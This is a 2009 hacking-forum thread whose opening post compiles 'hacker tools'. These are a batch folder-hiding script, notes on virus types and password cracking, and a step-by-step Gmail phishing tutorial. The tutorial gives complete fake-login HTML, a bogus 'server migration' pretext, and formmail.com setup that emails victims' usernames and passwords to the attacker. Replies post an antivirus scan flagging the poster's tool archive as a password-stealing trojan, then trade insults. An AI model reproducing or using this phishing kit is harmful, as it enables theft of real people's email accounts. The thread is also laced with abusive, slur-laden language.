--> www.incomplete.me.uk

LOCK A FILE AND PROGRAMS USING CMD
copy the code INTO YOUR NOTEPAD
SAVE it AS (YOURLOCKERNAME.BAT)



cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
echo Folder created
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter Password to Unlock Dexter's Folder
set/p "pass=>"
if NOT %pass%== YOUR PASSWORD HERE goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Dexter's Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

-: Computer Viruses :-


What is a Computer Virus ?
A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user. Types of viruses :-
The different types of viruses are as follows-

1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.

Examples of boot- sector viruses are Michelangelo and Stoned.

2) File or Program Viruses :- Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .

Some common file viruses are Sunday, Cascade.

3) Multipartite Viruses :- A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.

Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.

4) Stealth Viruses :- These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.

5) Polymorphic Viruses :- Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.

6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.


-: Password Hacking :-


Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.
Most passwords can be cracked by using following techniques :

1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.

2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information. Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:
* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on....
In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.
A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.

Check Your Password Strength


3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.
Always disable or change the applications' (both online and offline) default username-password pairs.
4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.
Long is the password, large is the time taken to brute force it.
5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.
Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.
It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.


-: Cracking GMail Account Password :-


Here is the most effective technique for cracking GMail Accounts Passwords.

This method uses 'Social Engineering' rather than 'Phishing'.

Follow the steps as given below :-

Success Rate :- 90%

Step-1 : Create your own fake gmail login form using HTML, which may look like one as shown below-


The HTML code for above login screen created by me is given below-

<html lang="en" dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type=text/css> <!-- body,td,div,p,a,font,span {font-family: arial,sans-serif} body {margin-top:2} .c {width: 4; height: 4} .bubble {background-color:#C3D9FF} .tl {padding: 0; width: 4; text-align: left; vertical-align: top} .tr {padding: 0; width: 4; text-align: right; vertical-align: top} .bl {padding: 0; width: 4; text-align: left; vertical-align: bottom} .br {padding: 0; width: 4; text-align: right; vertical-align: bottom} .caption {color:#000000; white-space:nowrap; background:#E8EEFA; text-align:center} .form-noindent {background-color: #ffffff; border: #C3D9FF 1px solid} .feature-image {padding: 15 0 0 0; vertical-align: top; text-align: right; } .feature-description {padding: 15 0 0 10; vertical-align: top; text-align: left; } // --> </style> <title> Gmail: Email from Google </title> </noscript> </head> <body bgcolor=#ffffff link=#0000FF vlink=#0000FF onload="OnLoad()"> <table width=95% border=0 align=center cellpadding=0 cellspacing=0> <tr valign=top> <td width=1%> <img src="https://mail.google.com/mail/help/images/logo.gif" border=0 width=143 height=59 alt="Gmail" align=left vspace=10/> </noscript> </td> <td width=99% bgcolor=#ffffff valign=top> <table width=100% cellpadding=1> <tr valign=bottom> <td><div align=right> </div></td> </tr> <tr> <td nowrap=nowrap> <table width=100% align=center cellpadding=0 cellspacing=0 bgcolor=#C3D9FF style=margin-bottom:5> <tr> <td class="bubble tl" align=left valign=top><img src=https://mail.google.com/mail/images/corner_tl.gif class=c alt="" /></td> <script>utmx_section("title")</script> <td class=bubble rowspan=2 style="font-family:arial;text-align:left;font-weight:bold;padding:5 0"><b>Welcome to Gmail</b></td> <td class="bubble tr" align=right valign=top><img src=https://mail.google.com/mail/images/corner_tr.gif class=c alt="" /></td> </noscript> </tr> <tr> <td class="bubble bl" align=left valign=bottom><img src=https://mail.google.com/mail/images/corner_bl.gif class=c alt="" /></td> <td class="bubble br" align=right valign=bottom><img src=https://mail.google.com/mail/images/corner_br.gif class=c alt="" /></td> </tr> </table> </td> </tr> </table> </td> </tr> </table> <table width=94% align=center cellpadding=5 cellspacing=1> <tr> <td valign=top style="text-align:left"><b>A Google approach to email.</b> <td valign=top> </tr> <tr> <td width=75% valign=top> <p style="margin-bottom: 0;text-align:left"><font size=-1> Dear <b><victim name></b>, <br><br> <table align="center" width="75%"> <tr><td><font size="-1"> We are moving database partly to our new server.<br> This require your account verification for proper redirection...!<br> Please verify yourself by entering correct google account 'username' and 'password'. Click 'Move'.<br> Repply this message within 72 hours.<br> Thank You ! for your Co-Operation........! </font><br><br> <b>GMail Team</b> </td></tr></table> </font> </p> </noscript> </noscript> </td> <td valign=top> <div id=login> <form id="gaia_loginform" action="login.asp" method="post"> <div id="gaia_loginbox"> <table class="form-noindent" cellspacing="3" cellpadding="5" width="100%" border="0"> <tr> <td valign="top" style="text-align:center" nowrap="nowrap" bgcolor="#e8eefa"> <div class="loginBox"> <table id="gaia_table" align="center" border="0" cellpadding="1" cellspacing="0"> <tr> <td colspan="2" align="center"> <table> <tr> <td valign="top"><font color="#0000FF">G</font><font color="#FF0000">o</font><font color="#FFCC33">o</font><font color="#0000FF">g</font><font color="#009900">l</font><font color="#FF0000">e</font></td> <td valign="middle"> <font size="+0"><b>Account</b></font> </td> </tr> </table></td> </tr> <script type="text/javascript"><!-- function onPreCreateAccount() { return true; } function onPreLogin() { if (window["onlogin"] != null) { return onlogin(); } else { return true; } } --></script> <tr> <td colspan="2" align="center"> </td> </tr> <tr> <td nowrap="nowrap"> <div align="right"> <span class="gaia le lbl"> Username: </span> </div></td> <td> <input type="text" name="Email" id="Email" size="18" value="" class='gaia le val' /> </td> </tr> <tr> <td></td> <td align="left"> </td> </tr> <tr> <td align="right"> <span class="gaia le lbl"> Password: </span> </td> <td> <input type="password" name="Passwd" id="Passwd" size="18" class="gaia le val" /> </td> </tr> <tr> <td> </td> <td align="left"> </td> </tr> <tr> <td> </td> <td align="left"> <input type="submit" class="gaia le button" name="signIn" value="Move" /> </td> </tr> </table> </div> </td> </tr> </table> </div> </form> </div> <br> <table class=form-noindent cellpadding=0 width=100% bgcolor=#E8EEFA id=links> <tr bgcolor=#E8EEFA> <td valign=top align="center"><font size=+0><br> <font size="-1"> <a href="http://mail.google.com/mail/help/intl/e ... tml">About Gmail</a > <a href="http://mail.google.com/mail/help/intl/e ... .html">New features!</a> </font> </font></td> </table> </noscript> </table> <br> <table width=95% align=center cellpadding=3 cellspacing=0 bgcolor=#C3D9FF style=margin-bottom:5> <tr> <td class="bubble tl" align=left valign=top><img src=https://mail.google.com/mail/images/corner_tl.gif class=c alt="" /></td> <td class=bubble rowspan=2 style=text-align:left> <div align=center> <font size=-1 color=#666666>©2008 Google - <a href="http://www.google.com/a/help/intl/en/us ... oter">Gmai l for Organizations</a> - <a href="http://gmailblog.blogspot.com/?utm_sour ... ftr">Gmail Blog</a> - <a href="http://mail.google.com/mail/help/intl/e ... ">Terms</a> - <a href="http://mail.google.com/support/">Help</a> </font> </div> </td> <td class="bubble tr" align=right valign=top><img src=https://mail.google.com/mail/images/corner_tr.gif class=c alt="" /></td> </tr> <tr> <td class="bubble bl" align=left valign=bottom><img src=https://mail.google.com/mail/images/corner_bl.gif class=c alt="" /></td> <td class="bubble br" align=right valign=bottom><img src=https://mail.google.com/mail/images/corner_br.gif class=c alt="" /></td> </tr> </table> </body> </html>

Step-2 : We require a form processor to process this fake login form, i.e. to store the username and password entered by the victim.
The username and password entered by victim can either be stored in database or send directly to the predefined e-mail address.
This can be done in two ways-

1) Using online form processors, which are freely available and ready to use.
eg. One of such form processor is provided by http://www.formmail.com . You have to register with www.formmail.com and configure your fake gmail login form to be processed by formmail.com . The configuration is different for each formmail account. Which may be something like following-

Your form must start with the following <form> HTML tag:<br> <form method="POST" action="http://fp1.formmail.com/cgi-bin/fm192"> You must also include the following hidden configuration fields in your form so that formmail.com knows what account and form processor to use on the submitted data: <input type="hidden" name="_pid" value="94566"> <input type="hidden" name="_fid" value="36THG54Z"> You must also inform this form processor who you wish to have your form results emailed to. To do so, you must include a hidden form field that specifies the recipient: <input type="hidden" name="recipient" value="your email address"> Please Note: the above field will work, but an even better solution is to use the ID number for that email address (thus hiding your address from spammers): <input type="hidden" name="recipient" value="1">

OR

2) If you are having your own domain hosted on some server; knowing the basics of ASP for processing HTML forms, you can create your own form processor in ASP (eg. 'login.asp' page) for above given fake gmail login form. Here you should only put both 'gmail.html' and 'login.asp' files to your server.

Step-3 : Now both of your 'Fake Gmail Login Form (eg. gmail.html)' and 'Form Processor' are ready to use.
Now you can send the fake gmail login form as an html mail to the victim's e-mail address, hoping that the victim gets fooled into entering the account username and password and click on 'Move' button.
Note:- You can use Microsoft Outlook for sending HTML e-mail.
Also, you must use your fake name as 'GMail Team' or 'GMail' while sending fake login form to victim.

As soon as victim click on 'Move' button he/she get redirected to predefined webpage (eg. http://www.gmail.com), while his/her 'username' and 'password' get emailed to you by formmail.com .
That's It............!

Done.......?

-: BlueTooth Hacking :-


Discovering Bluetooth Devices :-
Before any two bluetooth enabled devices can start communicating with one another, they must carry out a procedure known as discovery. It can be carried out by scanning for other active devices within the range.

Recommended Tools
BlueScanner
It will try to extract as much information as possible for each newly discovered device
Download
BlueSniff
It is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices
Download
BTBrowser
It is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth enabled devices. It works on phones that supports JSR-82 - the Java Bluetooth specification
Download
BTCrawler
It is a scanner for Windows Mobile based devices. It also implements the BlueJacking and BlueSna
Last edited by dextering12 on Fri Jun 19, 2009 3:24 am, edited 1 time in total.
Image
Image
plope0726
Posts: 826
Joined: Mon Dec 15, 2008 10:13 pm

Re: POST YOUR HACKERS TOOL BOX HERE!

Post by plope0726 »

dextering12 wrote: Some of the files can be seen as malware by some anitivirus but i asure you that every file is clean and the results you get are false/positive.
Yeah right you fucktard, if it's a hacking tool and AV picks it up it would label it as a hacking tool unless of course it's something else like a Trojan
Scan Results wrote: "Infections"

"File";
"Infection";
"Result"


"C:\Documents and Settings\Derka\Desktop\AIO[1].H_ck_rs.Tool.Box.Set_tonyka.softarchive.net.part1.rar";

"Trojan horse PSW.OnlineGames.FIY";
"Infected"


"C:\Documents and Settings\Derka\Desktop\AIO[1].H_ck_rs.Tool.Box.Set_tonyka.softarchive.net.part1.rar:\CrackersKit2009.v2\Dup 2.19\skins\custom.skin-ismail.rar";

"Trojan horse PSW.OnlineGames.FIY";
"Infected"


"C:\Documents and Settings\Derka\Desktop\AIO[1].H_ck_rs.Tool.Box.Set_tonyka.softarchive.net.part1.rar:\CrackersKit2009.v2\Dup 2.19\skins\custom.skin-ismail.rar:\some.application.v3.7-patch.exe";

"Trojan horse PSW.OnlineGames.FIY";
"Infected"


"C:\Documents and Settings\Derka\Desktop\AIO[1].H_ck_rs.Tool.Box.Set_tonyka.softarchive.net.part1.rar:\CrackersKit2009.v2\Dup 2.19\skins\SAVSkin2_for_dUP211.rar";

"Trojan horse PSW.OnlineGames.FIY";
"Infected"


"C:\Documents and Settings\Derka\Desktop\AIO[1].H_ck_rs.Tool.Box.Set_tonyka.softarchive.net.part1.rar:\CrackersKit2009.v2\Dup 2.19\skins\SAVSkin2_for_dUP211.rar:\SAVSkin2_for_dUP211\Example\DrWeb43x_KeyPatch.exe";

"Trojan horse PSW.OnlineGames.FIY";
"Infected"


"C:\Documents and Settings\Derka\Desktop\AIO[1].H_ck_rs.Tool.Box.Set_tonyka.softarchive.net.part1.rar:\CrackersKit2009.v2\IIDKing 2.01\iidking-v2.exe";

"Trojan horse Generic5.HTR";
"Infected"
This is just the first file. Why don't you run around the house with scissors. :)
User avatar
Zaffron
Posts: 491
Joined: Thu Dec 18, 2008 12:18 am
Location: Invading a small country

Post by Zaffron »

I miss paradox :'(

Sorry plope, but his flames were more interesting.
plope0726
Posts: 826
Joined: Mon Dec 15, 2008 10:13 pm

Post by plope0726 »

Zaffron wrote:I miss paradox :'(

Sorry plope, but his flames were more interesting.
Of course they were :lol: I miss his rants as well
dextering12
Posts: 12
Joined: Sun Jun 14, 2009 9:36 am
Location: Philippines
Contact:

!!!

Post by dextering12 »

actually i'm new here i just want to post my first thread...for the welcome gift!

heh how funny my first thread encounter a trashword

but its ok ...

hacker.org
how many true hackers here in this website?


actually i read all the thread but 8/10 aren't
white hat cracker or black hat cracker ...!!!heh!!!

SHOW YOUR TRUE IDENTITY HERE!!!
(i want to know YOU!)

why are you saying that you are a true hacker ?

what skills do you have about hacking?

Did you study about Visual Basics,C# and C++,hex numbers,javascript what about that?


..........................

Mr.Friendly
Image
Image
plope0726
Posts: 826
Joined: Mon Dec 15, 2008 10:13 pm

Re: !!!

Post by plope0726 »

dextering12 wrote:actually i'm new here i just want to post my first thread...for the welcome gift!

heh how funny my first thread encounter a trashword

but its ok ...

hacker.org
how many true hackers here in this website?


actually i read all the thread but 8/10 aren't
white hat cracker or black hat cracker ...!!!heh!!!

SHOW YOUR TRUE IDENTITY HERE!!!
(i want to know YOU!)

why are you saying that you are a true hacker ?

what skills do you have about hacking?

Did you study about Visual Basics,C# and C++,hex numbers,javascript what about that?


..........................

Mr.Friendly

Why don't you answer those questions, because so far you proven to us that you are just a script kiddie trying to get attention. And you know, there more to being a hacker than programming btw, and not all hackers are necessarily programmers.

As for your tools, refer to my first response.
Liidian
Posts: 202
Joined: Fri Jun 05, 2009 10:49 pm
Location: Guess

Re: !!!

Post by Liidian »

dextering12 wrote:actually i'm new here i just want to post my first thread...for the welcome gift!

heh how funny my first thread encounter a trashword

but its ok ...

hacker.org
how many true hackers here in this website?


actually i read all the thread but 8/10 aren't
white hat cracker or black hat cracker ...!!!heh!!!

SHOW YOUR TRUE IDENTITY HERE!!!
(i want to know YOU!)

why are you saying that you are a true hacker ?

what skills do you have about hacking?

Did you study about Visual Basics,C# and C++,hex numbers,javascript what about that?


..........................

Mr.Friendly
Please tell me why thjere even should be any crackers here? This is a hacking forum.
Second i don't know a singel language but i understood all the lines proper, i am not an expert in any fo the langs but i understand pretty much all of them :D
The whole "system" is a number of people creating a code all together, this code loops and is there for a "system".
System Zero could also be confirmed with one word "Hacker's"
dextering12
Posts: 12
Joined: Sun Jun 14, 2009 9:36 am
Location: Philippines
Contact:

Re: !!!

Post by dextering12 »

plope0726 wrote:
dextering12 wrote:actually i'm new here i just want to post my first thread...for the welcome gift!

heh how funny my first thread encounter a trashword

but its ok ...

hacker.org
how many true hackers here in this website?


actually i read all the thread but 8/10 aren't
white hat cracker or black hat cracker ...!!!heh!!!

SHOW YOUR TRUE IDENTITY HERE!!!
(i want to know YOU!)

why are you saying that you are a true hacker ?

what skills do you have about hacking?

Did you study about Visual Basics,C# and C++,hex numbers,javascript what about that?


..........................

Mr.Friendly

Why don't you answer those questions, because so far you proven to us that you are just a script kiddie trying to get attention. And you know, there more to being a hacker than programming btw, and not all hackers are necessarily programmers.

As for your tools, refer to my first response.



nonsense... do you know who is the Top hacker in the world!KNOW IT!!!
actually 98% Top,best,blabla Hackers is a programmer
and they know about C++,C# and ETC...



hahaha!!!

yeah not all hackers are necessarily programmers but they are NOOB Like YOU!!!LOL!!!

THINK NOOB!!!
Image
Image
plope0726
Posts: 826
Joined: Mon Dec 15, 2008 10:13 pm

Re: !!!

Post by plope0726 »

dextering12 wrote:
plope0726 wrote:
dextering12 wrote:actually i'm new here i just want to post my first thread...for the welcome gift!

heh how funny my first thread encounter a trashword

but its ok ...

hacker.org
how many true hackers here in this website?


actually i read all the thread but 8/10 aren't
white hat cracker or black hat cracker ...!!!heh!!!

SHOW YOUR TRUE IDENTITY HERE!!!
(i want to know YOU!)

why are you saying that you are a true hacker ?

what skills do you have about hacking?

Did you study about Visual Basics,C# and C++,hex numbers,javascript what about that?


..........................

Mr.Friendly

Why don't you answer those questions, because so far you proven to us that you are just a script kiddie trying to get attention. And you know, there more to being a hacker than programming btw, and not all hackers are necessarily programmers.

As for your tools, refer to my first response.



nonsense... do you know who is the Top hacker in the world!KNOW IT!!!
actually 98% Top,best,blabla Hackers is a programmer
and they know about C++,C# and ETC...



hahaha!!!

yeah not all hackers are necessarily programmers but they are NOOB Like YOU!!!LOL!!!

THINK NOOB!!!
Top hacker in the world?? :lol: I don't really care because it has nothing to do with stats, it has to do with knowledge. One isn't a "NOOB" because they don't program and just because someone isn't a programmer doesn't mean they can't program.

C#, hmmm? I'm guessing you're a Visual Studio/Microsoft bitch, huh? Point and click, drag and drop, let the software write the code for you right? Probably running Windows XP or Vista and don't know what another OS looks like.

Aside from programming another thing hackers are good at is using proper grammar and spotting Script Kiddies such as yourself. I would much rather be a "NOOB" Hacker than a GAY Script Kiddie any day.

My suggestion to you: Turn your computer off and go play Nintendo. Have a nice day :)
mihas
Posts: 16
Joined: Fri Jun 19, 2009 6:26 pm

Post by mihas »

LOL. No hacker would have time to join these forum :) They're mingled with their own project. Maybe you're right dex-12, that 8/10 thread in this forum is trash. But fortunately, it can make us interconnected. LOL. BTW, AFAIK hackers use *NIX variant and comprehend Assembler. Do You? =))
User avatar
Zaffron
Posts: 491
Joined: Thu Dec 18, 2008 12:18 am
Location: Invading a small country

Post by Zaffron »

mihas wrote:LOL. No hacker would have time to join these forum :) They're mingled with their own project. Maybe you're right dex-12, that 8/10 thread in this forum is trash. But fortunately, it can make us interconnected. LOL. BTW, AFAIK hackers use *NIX variant and comprehend Assembler. Do You? =))
LOL. your fucking stupid :)
mihas
Posts: 16
Joined: Fri Jun 19, 2009 6:26 pm

Post by mihas »

Zaffron wrote:
mihas wrote:LOL. No hacker would have time to join these forum :) They're mingled with their own project. Maybe you're right dex-12, that 8/10 thread in this forum is trash. But fortunately, it can make us interconnected. LOL. BTW, AFAIK hackers use *NIX variant and comprehend Assembler. Do You? =))
LOL. your fucking stupid :)
LOL. yes I'm fuckin stupid :) Do You? gyahahaha
User avatar
Zaffron
Posts: 491
Joined: Thu Dec 18, 2008 12:18 am
Location: Invading a small country

Post by Zaffron »

mihas wrote:
Zaffron wrote:
mihas wrote:LOL. No hacker would have time to join these forum :) They're mingled with their own project. Maybe you're right dex-12, that 8/10 thread in this forum is trash. But fortunately, it can make us interconnected. LOL. BTW, AFAIK hackers use *NIX variant and comprehend Assembler. Do You? =))
LOL. your fucking stupid :)
LOL. yes I'm fuckin stupid :) Do You? gyahahaha
ok what the fuck does that even mean?
plope0726
Posts: 826
Joined: Mon Dec 15, 2008 10:13 pm

Post by plope0726 »

Zaffron wrote:
mihas wrote:
Zaffron wrote: LOL. your fucking stupid :)
LOL. yes I'm fuckin stupid :) Do You? gyahahaha
ok what the fuck does that even mean?
I believe he is verifying the fact the he's a fucking idiot, as he does in all his posts :lol:
mihas
Posts: 16
Joined: Fri Jun 19, 2009 6:26 pm

Post by mihas »

plope0726 wrote:
Zaffron wrote:
mihas wrote: LOL. yes I'm fuckin stupid :) Do You? gyahahaha
ok what the fuck does that even mean?
I believe he is verifying the fact the he's a fucking idiot, as he does in all his posts :lol:
Bravo :)
Post Reply